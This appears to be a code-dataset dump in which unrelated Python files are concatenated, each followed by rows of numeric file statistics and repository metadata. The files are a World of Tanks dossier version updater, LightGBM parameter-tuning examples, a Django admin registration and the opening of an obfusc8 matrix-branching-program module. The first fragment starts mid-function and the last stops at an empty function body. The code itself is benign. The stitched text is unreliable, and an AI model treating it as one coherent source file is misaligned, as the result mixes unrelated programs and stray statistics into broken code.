while aproxDamageBlockedByArmor >= lastField + (damageAssistedStun & 4294901760L) and potentialDamagePerHit > potentialDamagePerHitForBlockedDamage:
lastField += 65536
damageAssistedStun -= 65536
potentialDamagePerHitForBlockedDamage = 1.0 * lastField / data['noDamageDirectHitsReceived']
if damageAssistedStun >= 0:
setStaticSizeBlockRecordValues(updateCtx, block, {lastFieldKey: (offset - 4, 'I'),'damageAssistedStun': (
offset + 8, 'I')
}, {lastFieldKey: lastField,'damageAssistedStun': damageAssistedStun
})
setVersion(updateCtx, 96)
return (
96, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier96(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements',
'vehTypeFrags', 'total', 'max15x15', 'max7x7', 'inscriptions', 'emblems', 'camouflages',
'compensation', 'achievements7x7', 'historical', 'maxHistorical', 'uniqueAchievements',
'fortBattles', 'maxFortBattles', 'fortSorties', 'maxFortSorties', 'fortAchievements',
'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7', 'globalMapCommon',
'maxGlobalMapCommon', 'fallout', 'maxFallout', 'falloutAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'ranked')
addBlock(updateCtx, 'maxRanked')
addBlock(updateCtx, 'rankedSeasons')
setVersion(updateCtx, 97)
return (
97, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier97(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements',
'vehTypeFrags', 'total', 'max15x15', 'max7x7', 'inscriptions', 'emblems', 'camouflages',
'compensation', 'achievements7x7', 'historical', 'maxHistorical', 'uniqueAchievements',
'fortBattles', 'maxFortBattles', 'fortSorties', 'maxFortSorties', 'fortAchievements',
'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7', 'globalMapCommon',
'maxGlobalMapCommon', 'fallout', 'maxFallout', 'falloutAchievements', 'ranked',
'maxRanked', 'rankedSeasons']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
vehFortAchievementsPacking = {'wins': (8, 'H'),
'capturedBasesInAttack': (10, 'H'),'capturedBasesInDefence': (12, 'H')}
removeRecords(updateCtx, 'fortAchievements', vehFortAchievementsPacking)
setVersion(updateCtx, 98)
return (
98, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier98(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements',
'vehTypeFrags', 'total', 'max15x15', 'max7x7', 'inscriptions', 'emblems', 'camouflages',
'compensation', 'achievements7x7', 'historical', 'maxHistorical', 'uniqueAchievements',
'fortBattles', 'maxFortBattles', 'fortSorties', 'maxFortSorties', 'fortAchievements',
'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7', 'globalMapCommon',
'maxGlobalMapCommon', 'fallout', 'maxFallout', 'falloutAchievements',
'ranked', 'maxRanked', 'rankedSeasons']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'a30x30')
addBlock(updateCtx, 'max30x30')
setVersion(updateCtx, 99)
return (
99, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier99(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortSorties',
'maxFortSorties',
'fortAchievements',
'singleAchievements',
'clanAchievements',
'rated7x7',
'maxRated7x7',
'globalMapCommon',
'maxGlobalMapCommon',
'fallout',
'maxFallout',
'ranked',
'maxRanked',
'rankedSeasons',
'a30x30', 'max30x30']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'epicBattle')
addBlock(updateCtx, 'maxEpicBattle')
addBlock(updateCtx, 'epicBattleAchievements')
setVersion(updateCtx, 100)
return (
100, updateCtx['dossierCompDescr'])
def __bootstrapTankmanDossierFrom(ver, compDescr):
if ver > 14:
return (ver, compDescr)
return (
TANKMAN_DOSSIER_VERSION, dossiers2.custom.tankmen_dossier1_updater.updateDossierCompDescr(compDescr))
def __addTankmanDossierUpdaters(module, seq):
for v in seq:
updaterName = '__updateFromTankmanDossier%d' % (v,)
if getattr(module, updaterName, None) is None:
setattr(module, updaterName, partial(__bootstrapTankmanDossierFrom, v))
getattr(module, updaterName).__name__ = updaterName
return
__addTankmanDossierUpdaters(sys.modules[__name__], xrange(10, 64))
def __updateFromTankmanDossier64(compDescr):
blocksLayout = [
'total', 'achievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addRecords(updateCtx, 'achievements', [('huntsman', 'H')], {})
setVersion(updateCtx, 65)
return (
65, updateCtx['dossierCompDescr'])
def __updateFromTankmanDossier65(compDescr):
blocksLayout = [
'total', 'achievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addRecords(updateCtx, 'achievements', [('sniper2', 'H'), ('mainGun', 'H')], {})
setVersion(updateCtx, 66)
return (
66, updateCtx['dossierCompDescr'])
def __updateFromClubDossier1(compDescr):
blocksLayout = [
'total', 'clubBattles', 'vehicles', 'maps', 'achievementsRated7x7']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'singleAchievementsRated7x7')
setVersion(updateCtx, 2)
return (
2, updateCtx['dossierCompDescr'])
class DossierVersionUpdaterBase(VersionUpdaterBase):
def __init__(self, logID, functionTemplate, latestVersion):
super(DossierVersionUpdaterBase, self).__init__(functionTemplate, latestVersion)
self.__logID = logID
def updateVersion(self, currentVersion, compDescr):
return self._updateToLatestVersion(currentVersion, self.__logID, compDescr)[0]
@singleton
class AccountDossierVersionUpdater(DossierVersionUpdaterBase):
def __init__(self):
super(self.__class__, self).__init__('Account dossier', ACCOUNT_DOSSIER_UPDATE_FUNCTION_TEMPLATE, ACCOUNT_DOSSIER_VERSION)
@singleton
class VehicleDossierVersionUpdater(DossierVersionUpdaterBase):
def __init__(self):
super(self.__class__, self).__init__('Vehicle dossier', VEHICLE_DOSSIER_UPDATE_FUNCTION_TEMPLATE, VEHICLE_DOSSIER_VERSION)
@singleton
class TankmanDossierVersionUpdater(DossierVersionUpdaterBase):
def __init__(self):
super(self.__class__, self).__init__('Tankman dossier', TANKMAN_DOSSIER_UPDATE_FUNCTION_TEMPLATE, TANKMAN_DOSSIER_VERSION)
@singleton
class ClanDossierVersionUpdater(DossierVersionUpdaterBase):
def __init__(self):
super(self.__class__, self).__init__('Clan dossier', CLAN_DOSSIER_UPDATE_FUNCTION_TEMPLATE, CLAN_DOSSIER_VERSION)
@singleton
class Rated7x7DossierVersionUpdater(DossierVersionUpdaterBase):
def __init__(self):
super(self.__class__, self).__init__('Rated7x7 dossier', RATED7X7_DOSSIER_UPDATE_FUNCTION_TEMPLATE, RATED7X7_DOSSIER_VERSION)
@singleton
class ClubDossierVersionUpdater(DossierVersionUpdaterBase):
def __init__(self):
super(self.__class__, self).__init__('Club dossier', CLUB_DOSSIER_UPDATE_FUNCTION_TEMPLATE, CLUB_DOSSIER_VERSION)
| 34.889875
| 168
| 0.644557
| 7,618
| 114,055
| 9.578498
| 0.08388
| 0.058244
| 0.040072
| 0.057751
| 0.828722
| 0.817731
| 0.812181
| 0.80563
| 0.757075
| 0.74792
| 0
| 0.043405
| 0.204936
| 114,055
| 3,269
| 169
| 34.889875
| 0.761273
| 0.001824
| 0
| 0.815143
| 0
| 0
| 0.401913
| 0.03207
| 0.000656
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.003605
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
81128a64f85910cdc5335d7c0eebc31714ff2804
| 11,457
|
py
|
Python
|
examples/regression_original/example_lgbm_regression.py
|
c60evaporator/tune-easy
|
a4053f5a09f3483414cb36b9fc3d7dc6753887f4
|
[
"BSD-3-Clause"
] | null | null | null |
examples/regression_original/example_lgbm_regression.py
|
c60evaporator/tune-easy
|
a4053f5a09f3483414cb36b9fc3d7dc6753887f4
|
[
"BSD-3-Clause"
] | null | null | null |
examples/regression_original/example_lgbm_regression.py
|
c60evaporator/tune-easy
|
a4053f5a09f3483414cb36b9fc3d7dc6753887f4
|
[
"BSD-3-Clause"
] | 1
|
2022-01-06T05:13:07.000Z
|
2022-01-06T05:13:07.000Z
|
# %% LGBMRegressor, GridSearch, no argument
import parent_import
from tune_easy import LGBMRegressorTuning
import pandas as pd
# Load dataset
df_reg = pd.read_csv(f'../sample_data/osaka_metropolis_english.csv')
TARGET_VARIABLE = 'approval_rate' # Target variable
USE_EXPLANATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude'] # Explanatory variables
y = df_reg[TARGET_VARIABLE].values
X = df_reg[USE_EXPLANATORY].values
# Run parameter tuning
tuning = LGBMRegressorTuning(X, y, USE_EXPLANATORY, y_colname=TARGET_VARIABLE)
tuning.plot_first_validation_curve()
tuning.grid_search_tuning()
tuning.plot_search_history()
tuning.plot_search_map()
tuning.plot_best_learning_curve()
tuning.plot_best_validation_curve()
tuning.plot_param_importances()
tuning.plot_feature_importances()
# %% LGBMRegressor, RandomSearch, no argument
import parent_import
from tune_easy import LGBMRegressorTuning
import pandas as pd
# Load dataset
df_reg = pd.read_csv(f'../sample_data/osaka_metropolis_english.csv')
TARGET_VARIABLE = 'approval_rate' # Target variable
USE_EXPLANATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude'] # Explanatory variables
y = df_reg[TARGET_VARIABLE].values
X = df_reg[USE_EXPLANATORY].values
# Run parameter tuning
tuning = LGBMRegressorTuning(X, y, USE_EXPLANATORY, y_colname=TARGET_VARIABLE)
tuning.random_search_tuning()
tuning.plot_search_history()
tuning.plot_search_map()
tuning.plot_best_learning_curve()
tuning.plot_best_validation_curve()
tuning.plot_param_importances()
tuning.plot_feature_importances()
# %% LGBMRegressor, BayesianOptimization, no argument
import parent_import
from tune_easy import LGBMRegressorTuning
import pandas as pd
# Load dataset
df_reg = pd.read_csv(f'../sample_data/osaka_metropolis_english.csv')
TARGET_VARIABLE = 'approval_rate' # Target variable
USE_EXPLANATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude'] # Explanatory variables
y = df_reg[TARGET_VARIABLE].values
X = df_reg[USE_EXPLANATORY].values
# Run parameter tuning
tuning = LGBMRegressorTuning(X, y, USE_EXPLANATORY, y_colname=TARGET_VARIABLE)
tuning.bayes_opt_tuning()
tuning.plot_search_history()
tuning.plot_search_map()
tuning.plot_best_learning_curve()
tuning.plot_best_validation_curve()
tuning.plot_param_importances()
tuning.plot_feature_importances()
# %% LGBMRegressor, Optuna, no argument
import parent_import
from tune_easy import LGBMRegressorTuning
import pandas as pd
# Load dataset
df_reg = pd.read_csv(f'../sample_data/osaka_metropolis_english.csv')
TARGET_VARIABLE = 'approval_rate' # Target variable
USE_EXPLANATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude'] # Explanatory variables
y = df_reg[TARGET_VARIABLE].values
X = df_reg[USE_EXPLANATORY].values
# Run parameter tuning
tuning = LGBMRegressorTuning(X, y, USE_EXPLANATORY, y_colname=TARGET_VARIABLE)
tuning.optuna_tuning()
tuning.plot_search_history()
tuning.plot_search_map()
tuning.plot_best_learning_curve()
tuning.plot_best_validation_curve()
tuning.plot_param_importances()
tuning.plot_feature_importances()
# %% LGBMRegressor, GridSearch, all arguments
import parent_import
from tune_easy import LGBMRegressorTuning
from lightgbm import LGBMRegressor
import pandas as pd
from sklearn.model_selection import KFold
import matplotlib.pyplot as plt
# Load dataset
df_reg = pd.read_csv(f'../sample_data/osaka_metropolis_english.csv')
TARGET_VARIABLE = 'approval_rate' # Target variable
USE_EXPLANATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude'] # Explanatory variables
y = df_reg[TARGET_VARIABLE].values
X = df_reg[USE_EXPLANATORY].values
# Run parameter tuning
tuning = LGBMRegressorTuning(X, y, USE_EXPLANATORY, y_colname=TARGET_VARIABLE)
tuning_params = {'reg_alpha': [0.0001, 0.003, 0.1],
'reg_lambda': [0.0001, 0.1],
'num_leaves': [2, 3, 4, 6],
'colsample_bytree': [0.4, 0.7, 1.0],
'subsample': [0.4, 1.0],
'subsample_freq': [0, 7],
'min_child_samples': [0, 2, 5, 10]
}
lgbmr = LGBMRegressor()
not_opt_params = {'objective': 'regression', # 最小化させるべき損失関数
'random_state': 42, # 乱数シード
'boosting_type': 'gbdt', # ブースター
'n_estimators': 10000 # 最大学習サイクル数(評価指標がearly_stopping_rounds連続で改善しなければ打ち切り)
}
fit_params = {'verbose': 0, # 学習中のコマンドライン出力
'early_stopping_rounds': 10, # 学習時、評価指標がこの回数連続で改善しなくなった時点でストップ
'eval_metric': 'rmse', # early_stopping_roundsの評価指標
'eval_set': [(X, y)]
}
param_scales = {'reg_alpha': 'log',
'reg_lambda': 'log',
'num_leaves': 'linear',
'colsample_bytree': 'linear',
'subsample': 'linear',
'subsample_freq': 'linear',
'min_child_samples': 'linear'
}
validation_curve_params = {'reg_alpha': [0, 0.0001, 0.0003, 0.001, 0.003, 0.01, 0.03, 0.1, 0.3, 1, 3, 10],
'reg_lambda': [0, 0.0001, 0.0003, 0.001, 0.003, 0.01, 0.03, 0.1, 0.3, 1, 3, 10],
'num_leaves': [2, 4, 8, 16, 32, 64, 96, 128, 160, 192, 224, 256],
'colsample_bytree': [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0],
'subsample': [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0],
'subsample_freq': [0, 1, 2, 3, 4, 5, 6, 7],
'min_child_samples': [0, 2, 5, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100]
}
fig, axes = plt.subplots(1, 3, figsize=(12, 3))
tuning.plot_first_validation_curve(estimator=lgbmr, validation_curve_params=validation_curve_params,
cv=KFold(n_splits=3, shuffle=True, random_state=42), seed=42, scoring='neg_mean_squared_error',
not_opt_params=not_opt_params, param_scales=param_scales,
plot_stats='median', axes=axes, fit_params=fit_params
)
tuning.grid_search_tuning(estimator=lgbmr, tuning_params=tuning_params,
cv=KFold(n_splits=3, shuffle=True, random_state=42), seed=42,
scoring='neg_mean_squared_error',
not_opt_params=not_opt_params, param_scales=param_scales,
mlflow_logging=None, grid_kws={'n_jobs': 3},
**fit_params)
fig, ax = plt.subplots(1, 1, figsize=(6, 4))
tuning.plot_search_history(ax=ax, x_axis='time', plot_kws={'color': 'green'})
plt.show()
tuning.plot_search_map(order=['min_child_samples', 'reg_alpha', 'num_leaves', 'colsample_bytree'],
rounddigits_title=4, rank_number=2, rounddigits_score=4,
subplot_kws={'figsize':(12, 14)}, heat_kws={'cmap': 'YlOrBr'})
fig, ax = plt.subplots(1, 1, figsize=(6, 4))
tuning.plot_best_learning_curve(plot_stats='median', ax=ax)
fig, axes = plt.subplots(1, 7, figsize=(30, 3))
tuning.plot_best_validation_curve(validation_curve_params=validation_curve_params, param_scales=param_scales,
plot_stats='median', axes=axes)
tuning.plot_param_importances()
fig, ax = plt.subplots(1, 1, figsize=(4, 3))
tuning.plot_feature_importances(ax=ax)
# %% LGBMRegressor, Optuna, all arguments
import parent_import
from tune_easy import LGBMRegressorTuning
from lightgbm import LGBMRegressor
import pandas as pd
from sklearn.model_selection import KFold
import matplotlib.pyplot as plt
import optuna
# Load dataset
df_reg = pd.read_csv(f'../sample_data/osaka_metropolis_english.csv')
TARGET_VARIABLE = 'approval_rate' # Target variable
USE_EXPLANATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude'] # Explanatory variables
y = df_reg[TARGET_VARIABLE].values
X = df_reg[USE_EXPLANATORY].values
# Run parameter tuning
tuning = LGBMRegressorTuning(X, y, USE_EXPLANATORY, y_colname=TARGET_VARIABLE)
tuning_params = {'reg_alpha': (0.0001, 0.1),
'reg_lambda': (0.0001, 0.1),
'num_leaves': (2, 6),
'colsample_bytree': (0.4, 1.0),
'subsample': (0.4, 1.0),
'subsample_freq': (0, 7),
'min_child_samples': (0, 10)
}
lgbmr = LGBMRegressor()
not_opt_params = {'objective': 'regression', # 最小化させるべき損失関数
'random_state': 42, # 乱数シード
'boosting_type': 'gbdt', # ブースター
'n_estimators': 10000 # 最大学習サイクル数(評価指標がearly_stopping_rounds連続で改善しなければ打ち切り)
}
fit_params = {'verbose': 0, # 学習中のコマンドライン出力
'early_stopping_rounds': 10, # 学習時、評価指標がこの回数連続で改善しなくなった時点でストップ
'eval_metric': 'rmse', # early_stopping_roundsの評価指標
'eval_set': [(X, y)]
}
param_scales = {'reg_alpha': 'log',
'reg_lambda': 'log',
'num_leaves': 'linear',
'colsample_bytree': 'linear',
'subsample': 'linear',
'subsample_freq': 'linear',
'min_child_samples': 'linear'
}
validation_curve_params = {'reg_alpha': [0, 0.0001, 0.0003, 0.001, 0.003, 0.01, 0.03, 0.1, 0.3, 1, 3, 10],
'reg_lambda': [0, 0.0001, 0.0003, 0.001, 0.003, 0.01, 0.03, 0.1, 0.3, 1, 3, 10],
'num_leaves': [2, 4, 8, 16, 32, 64, 96, 128, 160, 192, 224, 256],
'colsample_bytree': [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0],
'subsample': [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0],
'subsample_freq': [0, 1, 2, 3, 4, 5, 6, 7],
'min_child_samples': [0, 2, 5, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100]
}
int_params = ['num_leaves', 'subsample_freq', 'min_child_samples']
tuning.optuna_tuning(estimator=lgbmr, tuning_params=tuning_params,
cv=KFold(n_splits=3, shuffle=True, random_state=42), seed=42,
scoring='neg_mean_squared_error', n_trials=400,
study_kws={'sampler': optuna.samplers.TPESampler(seed=42)},
optimize_kws={'show_progress_bar': True},
not_opt_params=not_opt_params, int_params=int_params, param_scales=param_scales,
mlflow_logging=None,
**fit_params
)
fig, ax = plt.subplots(1, 1, figsize=(6, 4))
tuning.plot_search_history(ax=ax, x_axis='time', plot_kws={'color': 'green'})
plt.show()
tuning.plot_search_map(order=['min_child_samples', 'reg_alpha', 'num_leaves', 'colsample_bytree'],
rounddigits_title=4, rank_number=2, rounddigits_score=4,
subplot_kws={'figsize':(20, 15)}, heat_kws={'cmap': 'YlOrBr'})
fig, ax = plt.subplots(1, 1, figsize=(6, 4))
tuning.plot_best_learning_curve(plot_stats='median', ax=ax)
fig, axes = plt.subplots(1, 7, figsize=(30, 3))
tuning.plot_best_validation_curve(validation_curve_params=validation_curve_params, param_scales=param_scales,
plot_stats='median', axes=axes)
tuning.plot_param_importances()
fig, ax = plt.subplots(1, 1, figsize=(4, 3))
tuning.plot_feature_importances(ax=ax)
# %%
| 48.753191
| 130
| 0.646242
| 1,506
| 11,457
| 4.63745
| 0.13745
| 0.05441
| 0.027491
| 0.0189
| 0.946449
| 0.930842
| 0.922251
| 0.922251
| 0.913087
| 0.913087
| 0
| 0.060079
| 0.22711
| 11,457
| 234
| 131
| 48.961538
| 0.728628
| 0.086759
| 0
| 0.761905
| 0
| 0
| 0.172506
| 0.035135
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.17619
| 0
| 0.17619
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8127bef3c64ef573c5b7def9e716c2c99bb6edaa
| 215
|
py
|
Python
|
library/admin.py
|
sp35/LibraryMS-Backend
|
fb763bac2ea9f2198670de1fe8b364c78f6779e2
|
[
"MIT"
] | null | null | null |
library/admin.py
|
sp35/LibraryMS-Backend
|
fb763bac2ea9f2198670de1fe8b364c78f6779e2
|
[
"MIT"
] | null | null | null |
library/admin.py
|
sp35/LibraryMS-Backend
|
fb763bac2ea9f2198670de1fe8b364c78f6779e2
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Book, BorrowedBook, Librarian, Student
admin.site.register(Book)
admin.site.register(Student)
admin.site.register(Librarian)
admin.site.register(BorrowedBook)
| 21.5
| 58
| 0.818605
| 28
| 215
| 6.285714
| 0.428571
| 0.204545
| 0.386364
| 0.272727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083721
| 215
| 9
| 59
| 23.888889
| 0.893401
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
be2156769a82adbff9a270c51f1693e7b50afffc
| 13,344
|
py
|
Python
|
obfusc8/bp.py
|
tum-i22/indistinguishability-obfuscation
|
67e5b7f8eedbb65434c252611b303b210c672b5b
|
[
"Apache-2.0"
] | 19
|
2015-05-22T17:41:50.000Z
|
2020-09-09T11:08:53.000Z
|
obfusc8/bp.py
|
tum-i22/indistinguishability-obfuscation
|
67e5b7f8eedbb65434c252611b303b210c672b5b
|
[
"Apache-2.0"
] | 1
|
2021-03-19T16:07:00.000Z
|
2021-03-19T16:47:26.000Z
|
obfusc8/bp.py
|
nathanawmk/indistinguishability-obfuscation
|
67e5b7f8eedbb65434c252611b303b210c672b5b
|
[
"Apache-2.0"
] | 4
|
2020-10-13T05:10:09.000Z
|
2021-04-06T07:49:06.000Z
|
"""Matrix Branching Programs with 5x5 permutation matrices
This module implements a variant of Matrix Branching Programs that is
close to the ones described by Barrington in [0]. Additionally it
implements the transformation of logical circuits consisting solely of
AND- and NOT-gates to these MBPs using Barrington's Theorem. The resulting
MBPs make use of numpy arrays as matrices for their speed benefits in
comparison to Sage matrices.
In order to speed up the transformation and to relief memory consumption
the transformation relies on integer IDs instead of permutations / matrices.
[0] D. A. Barrington. "Bounded-width polynomial-size branching programs
recognize exactly those languages in NC 1." Proceedings of the eighteenth
annual ACM symposium on Theory of computing. ACM, 1986.
"""
from numpy import array, where, dot
from sys import getsizeof
from os import remove
from itertools import izip
import cPickle
import logging
#---------- Branching Programs ------------------
class BranchingProgram(object):
"""Branching programs as described by Barrington using 5x5
permutation matrices as instructions.
indexList contains all values of inp(i)
ins0 and ins1 contain all matrices A_i,0 / A_i,1 respectively
"""
def __init__(self, ins0, ins1, indexList, zeroPerm, onePerm):
assert(len(ins0) == len(ins1))
assert(not (zeroPerm==onePerm).all())
assert(len(indexList) == len(ins0))
self.length = len(ins0)
self.ins0 = ins0
self.ins1 = ins1
self.indexList = indexList
self.zeroPerm = zeroPerm
self.onePerm = onePerm
def evaluate(self, inputs):
"""Evaluate the branching program for list of input values"""
logging.info('Evaluating branching program for inputs: %s', str(inputs))
assert(len(inputs) >= max(self.indexList))
assert(all(bit in (0,1) for bit in inputs))
matrices = ((in1 if inputs[index] else in0) for in0, in1, index in izip(self.ins0, self.ins1, self.indexList))
result = reduce(dot, matrices)
ret = -1
if (result==self.zeroPerm).all(): ret = 0
if (result==self.onePerm).all(): ret = 1
logging.info('MBP evaluation result: %d', ret)
assert(ret != -1)
return ret
def getInstructionString(self):
"""Return a human readable string of the instructions"""
strIns0 = map(_matrix2cycle, self.ins0)
strIns1 = map(_matrix2cycle, self.ins1)
strList = ["<%d,%s,%s>"%a for a in izip(self.indexList, strIns0, strIns1)]
return ''.join(strList)
@classmethod
def fromCircuit(cls, circuit, caching=True):
"""Return a reverse-normalized (onePerm = identity) branching
program as required by the rest of the construction
This implementation uses integer IDs instead of permutation
matrices during the generation for performance reasons.
For a breakdown of how this mappings were created refer to
the module generate_bp_mappings
"""
mappings = precalculatedMappings()
id2perms = precalculatedId2PermList()
class saveCtr: x=1
def fastGetIns(gate):
#Input
if gate.getType() == -1:
return ([0], [1], [gate.pos])
#NotGate
elif gate.getType() == 0:
id0List, id1List, indexList = fastGetIns(gate.input1)
id0List[-1] = mappings[0][id0List[-1]]
id1List[-1] = mappings[0][id1List[-1]]
id0List[:-1] = [mappings[1][id] for id in id0List[:-1]]
id1List[:-1] = [mappings[1][id] for id in id1List[:-1]]
return (id0List, id1List, indexList)
elif gate.getType() == 1:
id0List1, id1List1, indexList1 = fastGetIns(gate.input1)
a01 = [mappings[2][id] for id in id0List1]
a11 = [mappings[2][id] for id in id1List1]
a03 = [mappings[3][id] for id in id0List1]
a13 = [mappings[3][id] for id in id1List1]
#'garbage collection'
id0List1 = None
id1List1 = None
#write to disk
if caching==True and getsizeof(a01) > 1000000: #1 mb
logging.info('caching with size %d...'%getsizeof(a01))
with open('%d.tmp'%saveCtr.x, 'wb') as output:
cPickle.dump(a01, output, -1)
cPickle.dump(a11, output, -1)
cPickle.dump(a03, output, -1)
cPickle.dump(a13, output, -1)
a01 = None
a11 = None
a03 = None
a13 = None
saveCtr.x += 1
id0List2, id1List2, indexList2 = fastGetIns(gate.input2)
a02 = [mappings[4][id] for id in id0List2]
a12 = [mappings[4][id] for id in id1List2]
a04 = [mappings[5][id] for id in id0List2]
a14 = [mappings[5][id] for id in id1List2]
#'garbage collection'
id0List2 = None
id1List2 = None
#load from disk
if a01 is None:
logging.info('loading...')
saveCtr.x -= 1
with open('%d.tmp'%saveCtr.x, 'rb') as input:
a01 = cPickle.load(input)
a11 = cPickle.load(input)
a03 = cPickle.load(input)
a13 = cPickle.load(input)
remove('%d.tmp'%saveCtr.x)
return (a01+a02+a03+a04, a11+a12+a13+a14, indexList1+indexList2+indexList1+indexList2)
raise AttributeError
logging.info('Calculating permutation idList')
id0List, id1List, indexList = fastGetIns(circuit.outputGate)
logging.info('Mapping ids to permutation matrices')
#instructions = [tuple(id2perms[id] for id in t) for t in idList]
ins0 = [id2perms[id] for id in id0List]
ins1 = [id2perms[id] for id in id1List]
ins0.append(_normalInv())
ins1.append(_normalInv())
indexList.append(0)
return BranchingProgram(ins0, ins1, indexList, _normalInv(), _identity())
@classmethod
def estimateBPSize(cls, circuit):
"""Recursively calculates the expected size of the BP belonging to circuit.
Uses the formula
len_BP(gate) = | 1 if type(gate) = Input
| len(gate.input) if type(gate) = NOT
| 2*len(gate.input1) + 2*len(gate.input2) if type(gate) = AND
Note that this 'estimation' should indeed be exact.
"""
cache = {}
def _estimateBPSize(gate):
if gate.getType() == -1:
return 1
if gate.id in cache:
ret = cache[gate.id]
else:
if gate.getType() == 0:
ret = _estimateBPSize(gate.input1)
elif gate.getType() == 1:
ret = 2*_estimateBPSize(gate.input1)+2*_estimateBPSize(gate.input2)
cache[gate.id] = ret
return ret
return _estimateBPSize(circuit.outputGate)+1
def __str__(self):
return 'Branching Program of length %d, Zero Perm: %s, One Perm: %s' % \
(self.length, _matrix2cycle(self.zeroPerm), _matrix2cycle(self.onePerm))
def _matrix2cycle(permMatrix):
"""Helper function to get cycle notation of permutation matrix"""
lookedAt = [0]*permMatrix.shape[0]
ret = ''
indices = list(where(permMatrix==1)[1])
while not all(lookedAt):
start = lookedAt.index(0)
if indices[start] != start: #doesn't point to itself
ret += '('+str(start)
curr = indices[start]
while start!=curr:
ret += str(curr)
lookedAt[curr] = 1
curr = indices[curr]
ret += ')'
lookedAt[start] = 1
if ret=='': ret='e'
return ret
def _identity(): return array([[1,0,0,0,0],[0,1,0,0,0],[0,0,1,0,0],[0,0,0,1,0],[0,0,0,0,1]]) #e
def _normalInv(): return array([[0,0,0,0,1],[1,0,0,0,0],[0,1,0,0,0],[0,0,1,0,0],[0,0,0,1,0]]) #(04321)
def precalculatedMappings():
"""Generated using calculateMappings() from generate_bp_mappings.py"""
